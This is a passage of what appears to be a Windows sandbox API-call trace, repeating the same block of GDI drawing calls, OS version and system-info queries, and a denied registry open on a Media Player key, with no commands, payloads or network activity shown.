dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.760] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.760] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.760] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.760] BeginPath (hdc=0x0) returned 0 [0087.760] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.760] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.760] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.760] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.760] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.760] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.760] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.760] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.761] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x530401d6 [0087.761] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x550401d3 [0087.761] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b28 [0087.761] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b29 [0087.761] CombineRgn (hrgnDst=0x1040b28, hrgnSrc1=0x530401d6, hrgnSrc2=0x550401d3, iMode=1) returned 1 [0087.761] CombineRgn (hrgnDst=0x1040b29, hrgnSrc1=0x530401d6, hrgnSrc2=0x550401d3, iMode=4) returned 2 [0087.761] CreateSolidBrush (color=0xff) returned 0x2100b27 [0087.761] CreateSolidBrush (color=0xff0000) returned 0x1100b2a [0087.761] DeleteObject (ho=0x1100b2a) returned 1 [0087.761] DeleteObject (ho=0x550401d3) returned 1 [0087.761] DeleteObject (ho=0x530401d6) returned 1 [0087.761] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.761] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.761] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.761] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.761] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.761] BeginPath (hdc=0x0) returned 0 [0087.761] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.761] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.761] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.761] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.761] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.761] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.761] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.761] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.761] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x560401d3 [0087.761] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x540401d6 [0087.761] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b2b [0087.761] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b2c [0087.761] CombineRgn (hrgnDst=0x1040b2b, hrgnSrc1=0x560401d3, hrgnSrc2=0x540401d6, iMode=1) returned 1 [0087.761] CombineRgn (hrgnDst=0x1040b2c, hrgnSrc1=0x560401d3, hrgnSrc2=0x540401d6, iMode=4) returned 2 [0087.761] CreateSolidBrush (color=0xff) returned 0x2100b2a [0087.761] CreateSolidBrush (color=0xff0000) returned 0x1100b2d [0087.761] DeleteObject (ho=0x1100b2d) returned 1 [0087.761] DeleteObject (ho=0x540401d6) returned 1 [0087.761] DeleteObject (ho=0x560401d3) returned 1 [0087.761] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.761] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.761] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.762] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.762] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.762] BeginPath (hdc=0x0) returned 0 [0087.762] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.762] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.762] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.762] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.762] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.762] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.762] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.762] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.762] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x550401d6 [0087.762] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x570401d3 [0087.762] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b2e [0087.762] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b2f [0087.762] CombineRgn (hrgnDst=0x1040b2e, hrgnSrc1=0x550401d6, hrgnSrc2=0x570401d3, iMode=1) returned 1 [0087.762] CombineRgn (hrgnDst=0x1040b2f, hrgnSrc1=0x550401d6, hrgnSrc2=0x570401d3, iMode=4) returned 2 [0087.762] CreateSolidBrush (color=0xff) returned 0x2100b2d [0087.762] CreateSolidBrush (color=0xff0000) returned 0x1100b30 [0087.762] DeleteObject (ho=0x1100b30) returned 1 [0087.762] DeleteObject (ho=0x570401d3) returned 1 [0087.762] DeleteObject (ho=0x550401d6) returned 1 [0087.762] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.762] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.762] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.762] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.762] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.762] BeginPath (hdc=0x0) returned 0 [0087.762] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.762] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.762] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.762] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.762] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.762] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.762] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.762] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.763] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x580401d3 [0087.763] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x560401d6 [0087.763] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b31 [0087.763] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b32 [0087.763] CombineRgn (hrgnDst=0x1040b31, hrgnSrc1=0x580401d3, hrgnSrc2=0x560401d6, iMode=1) returned 1 [0087.763] CombineRgn (hrgnDst=0x1040b32, hrgnSrc1=0x580401d3, hrgnSrc2=0x560401d6, iMode=4) returned 2 [0087.763] CreateSolidBrush (color=0xff) returned 0x2100b30 [0087.763] CreateSolidBrush (color=0xff0000) returned 0x1100b33 [0087.763] DeleteObject (ho=0x1100b33) returned 1 [0087.763] DeleteObject (ho=0x560401d6) returned 1 [0087.763] DeleteObject (ho=0x580401d3) returned 1 [0087.763] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.763] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.763] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.763] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.763] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.763] BeginPath (hdc=0x0) returned 0 [0087.763] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.763] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.763] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.763] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.763] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.763] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.763] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.763] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.763] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x570401d6 [0087.763] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x590401d3 [0087.763] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b34 [0087.763] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b35 [0087.763] CombineRgn (hrgnDst=0x1040b34, hrgnSrc1=0x570401d6, hrgnSrc2=0x590401d3, iMode=1) returned 1 [0087.763] CombineRgn (hrgnDst=0x1040b35, hrgnSrc1=0x570401d6, hrgnSrc2=0x590401d3, iMode=4) returned 2 [0087.763] CreateSolidBrush (color=0xff) returned 0x2100b33 [0087.763] CreateSolidBrush (color=0xff0000) returned 0x1100b36 [0087.763] DeleteObject (ho=0x1100b36) returned 1 [0087.763] DeleteObject (ho=0x590401d3) returned 1 [0087.763] DeleteObject (ho=0x570401d6) returned 1 [0087.763] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.763] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.764] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.764] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.764] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.764] BeginPath (hdc=0x0) returned 0 [0087.764] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.764] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.764] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.764] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.764] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.764] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.764] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.764] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.764] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5a0401d3 [0087.764] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x580401d6 [0087.764] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b37 [0087.764] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b38 [0087.764] CombineRgn (hrgnDst=0x1040b37, hrgnSrc1=0x5a0401d3, hrgnSrc2=0x580401d6, iMode=1) returned 1 [0087.764] CombineRgn (hrgnDst=0x1040b38, hrgnSrc1=0x5a0401d3, hrgnSrc2=0x580401d6, iMode=4) returned 2 [0087.764] CreateSolidBrush (color=0xff) returned 0x2100b36 [0087.764] CreateSolidBrush (color=0xff0000) returned 0x1100b39 [0087.764] DeleteObject (ho=0x1100b39) returned 1 [0087.764] DeleteObject (ho=0x580401d6) returned 1 [0087.764] DeleteObject (ho=0x5a0401d3) returned 1 [0087.764] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.764] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.764] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.764] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.764] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.764] BeginPath (hdc=0x0) returned 0 [0087.764] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.764] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.764] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.764] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.764] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.764] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.764] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.764] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.765] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x590401d6 [0087.765] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5b0401d3 [0087.765] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b3a [0087.765] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b3b [0087.765] CombineRgn (hrgnDst=0x1040b3a, hrgnSrc1=0x590401d6, hrgnSrc2=0x5b0401d3, iMode=1) returned 1 [0087.765] CombineRgn (hrgnDst=0x1040b3b, hrgnSrc1=0x590401d6, hrgnSrc2=0x5b0401d3, iMode=4) returned 2 [0087.765] CreateSolidBrush (color=0xff) returned 0x2100b39 [0087.765] CreateSolidBrush (color=0xff0000) returned 0x1100b3c [0087.765] DeleteObject (ho=0x1100b3c) returned 1 [0087.765] DeleteObject (ho=0x5b0401d3) returned 1 [0087.765] DeleteObject (ho=0x590401d6) returned 1 [0087.765] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.765] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.765] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.765] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.765] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.765] BeginPath (hdc=0x0) returned 0 [0087.765] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.765] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.765] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.765] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.765] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.765] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.765] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.765] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.765] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5c0401d3 [0087.765] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5a0401d6 [0087.765] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b3d [0087.765] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b3e [0087.765] CombineRgn (hrgnDst=0x1040b3d, hrgnSrc1=0x5c0401d3, hrgnSrc2=0x5a0401d6, iMode=1) returned 1 [0087.765] CombineRgn (hrgnDst=0x1040b3e, hrgnSrc1=0x5c0401d3, hrgnSrc2=0x5a0401d6, iMode=4) returned 2 [0087.765] CreateSolidBrush (color=0xff) returned 0x2100b3c [0087.765] CreateSolidBrush (color=0xff0000) returned 0x1100b3f [0087.765] DeleteObject (ho=0x1100b3f) returned 1 [0087.765] DeleteObject (ho=0x5a0401d6) returned 1 [0087.765] DeleteObject (ho=0x5c0401d3) returned 1 [0087.765] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.765] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.765] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.765] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.766] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.766] BeginPath (hdc=0x0) returned 0 [0087.766] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.766] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.766] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.766] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.766] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.766] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.766] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.766] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.766] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5b0401d6 [0087.766] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5d0401d3 [0087.766] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b40 [0087.766] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040b41 [0087.766] CombineRgn (hrgnDst=0x1040b40, hrgnSrc1=0x5b0401d6, hrgnSrc2=0x5d0401d3, iMode=1) returned 1 [0087.766] CombineRgn (hrgnDst=0x1040b41, hrgnSrc1=0x5b0401d6, hrgnSrc2=0x5d0401d3, iMode=4) returned 2 [0087.766] CreateSolidBrush (color=0xff) returned 0x2100b3f [0087.766] CreateSolidBrush (color=0xff0000) returned 0x1100b42 [0087.766] DeleteObject (ho=0x1100b42) returned 1 [0087.766] DeleteObject (ho=0x5d0401d3) returned 1 [0087.766] DeleteObject (ho=0x5b0401d6) returned 1 [0087.766] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.766] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.766] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.766] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.766] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.766] BeginPath (hdc=0x0) returned 0 [0087.766] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.766] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.766] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.766] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.766] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.766] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 